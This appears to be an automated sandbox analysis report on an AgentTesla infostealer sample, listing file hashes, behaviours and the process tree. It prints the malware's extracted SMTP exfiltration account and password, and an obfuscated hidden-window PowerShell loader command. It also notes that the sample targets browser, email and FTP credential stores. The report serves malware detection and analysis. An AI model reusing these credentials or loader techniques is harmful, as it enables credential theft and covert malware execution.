Analysis
-
max time kernel
146s -
max time network
147s -
platform
windows7_x64 -
resource
win7-20240220-en -
resource tags
arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system -
submitted
12-06-2024 02:07
Static task
static1
Behavioral task
behavioral1
Sample
MSK872314.exe
Resource
win7-20240220-en
Behavioral task
behavioral2
Sample
MSK872314.exe
Resource
win10v2004-20240508-en
General
-
Target
MSK872314.exe
-
Size
630KB
-
MD5
397c71ddf48527dc363407c2dc6382fd
-
SHA1
8d309abbd3842e15778dad790e3bb36371060eab
-
SHA256
fd2ed2817b36ad04fda64c952b1a38e9a4cee86a247d0a7e9dfea5bab81b2e82
-
SHA512
a5b4bf00e115c99a2433ebf7f91ea7fc12e6c5a6f06d049d89b9027b29bba769ec51d3ace6a1671595d685db7e74e458cb75e39fe8c1abb9533ae19d0c308a46
-
SSDEEP
12288:jgSUrka1W50Dt/RtlieB6TxOL0w83/ImkT4bdxrVZ4PBiFeAUVABi+ksSj:hfaQ50DljNNow83gkbTBSYUK/ksSj
Malware Config
Extracted
Protocol: smtp- Host:
smtp.gmail.com - Port:
587 - Username:
[email protected] - Password:
oadc jzrw bmvr klnl
Extracted
agenttesla
Protocol: smtp- Host:
smtp.gmail.com - Port:
587 - Username:
[email protected] - Password:
oadc jzrw bmvr klnl - Email To:
[email protected]
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Loads dropped DLL 2 IoCs
Processes:
powershell.exeDelggeres.exepid process 3064 powershell.exe 2424 Delggeres.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 6 api.ipify.org 7 api.ipify.org -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
Processes:
Delggeres.exepid process 2424 Delggeres.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
powershell.exeDelggeres.exepid process 3064 powershell.exe 2424 Delggeres.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 3064 set thread context of 2424 3064 powershell.exe Delggeres.exe -
Drops file in Program Files directory 2 IoCs
Processes:
MSK872314.exedescription ioc process File opened for modification C:\Program Files (x86)\Common Files\firbens\psycholeptic.ini MSK872314.exe File opened for modification C:\Program Files (x86)\Common Files\boltholes.obl MSK872314.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 10 IoCs
Processes:
powershell.exeDelggeres.exepid process 3064 powershell.exe 3064 powershell.exe 3064 powershell.exe 3064 powershell.exe 3064 powershell.exe 3064 powershell.exe 3064 powershell.exe 3064 powershell.exe 2424 Delggeres.exe 2424 Delggeres.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
powershell.exepid process 3064 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exeDelggeres.exedescription pid process Token: SeDebugPrivilege 3064 powershell.exe Token: SeDebugPrivilege 2424 Delggeres.exe -
Suspicious use of WriteProcessMemory 14 IoCs
Processes:
MSK872314.exepowershell.exedescription pid process target process PID 3032 wrote to memory of 3064 3032 MSK872314.exe powershell.exe PID 3032 wrote to memory of 3064 3032 MSK872314.exe powershell.exe PID 3032 wrote to memory of 3064 3032 MSK872314.exe powershell.exe PID 3032 wrote to memory of 3064 3032 MSK872314.exe powershell.exe PID 3064 wrote to memory of 2596 3064 powershell.exe cmd.exe PID 3064 wrote to memory of 2596 3064 powershell.exe cmd.exe PID 3064 wrote to memory of 2596 3064 powershell.exe cmd.exe PID 3064 wrote to memory of 2596 3064 powershell.exe cmd.exe PID 3064 wrote to memory of 2424 3064 powershell.exe Delggeres.exe PID 3064 wrote to memory of 2424 3064 powershell.exe Delggeres.exe PID 3064 wrote to memory of 2424 3064 powershell.exe Delggeres.exe PID 3064 wrote to memory of 2424 3064 powershell.exe Delggeres.exe PID 3064 wrote to memory of 2424 3064 powershell.exe Delggeres.exe PID 3064 wrote to memory of 2424 3064 powershell.exe Delggeres.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\MSK872314.exe"C:\Users\Admin\AppData\Local\Temp\MSK872314.exe"1⤵
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:3032 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Forretningsforbindelserne=Get-Content 'C:\Users\Admin\AppData\Local\Bridgebuilding\oralizes\indart\Insider\Pigout.Smr';$Sheetwise=$Forretningsforbindelserne.SubString(50997,3);.$Sheetwise($Forretningsforbindelserne)"2⤵
- Command and Scripting Interpreter: PowerShell
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3064 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" "/c set /A 1^^0"3⤵PID:2596
-
C:\Users\Admin\AppData\Local\Temp\Delggeres.exe"C:\Users\Admin\AppData\Local\Temp\Delggeres.exe"3⤵
- Loads dropped DLL
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2424
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
49KB
MD55b666f06cc1e9de33f4f56e415241506
SHA18253f4854a516d91f9ac7189d108cfe2822f5a2b
SHA2569c121e08561368b3fabba2fef46f73a398fd27b54ae7a9b511d1e782cd50dfef
SHA512e2f444a080037474a69ecdff6545638a0a173a3e7230046f4e0a3b659511516806d13c406267d570d7b2006d7e9efbb91b8fbc02996d9ee31ffa801b5e7027f9
-
Filesize
310KB
MD5f96b7a4776a6d23f3a50da5897f86911
SHA1839f9621509a37133fedf3465944999a5c88b8bf
SHA2567d6c274ad802ad0f166f4cd6bf1a72e289d55900481105029c8146265e969b29
SHA5127f6befad553bcd030d48b5cade86c26394f3ae306abef0bf6f34eca72756947f85d1983874c993a237bfdc585b41d7bd73e8147cc2084c631df157226229580e
-
Filesize
630KB
MD5397c71ddf48527dc363407c2dc6382fd
SHA18d309abbd3842e15778dad790e3bb36371060eab
SHA256fd2ed2817b36ad04fda64c952b1a38e9a4cee86a247d0a7e9dfea5bab81b2e82
SHA512a5b4bf00e115c99a2433ebf7f91ea7fc12e6c5a6f06d049d89b9027b29bba769ec51d3ace6a1671595d685db7e74e458cb75e39fe8c1abb9533ae19d0c308a46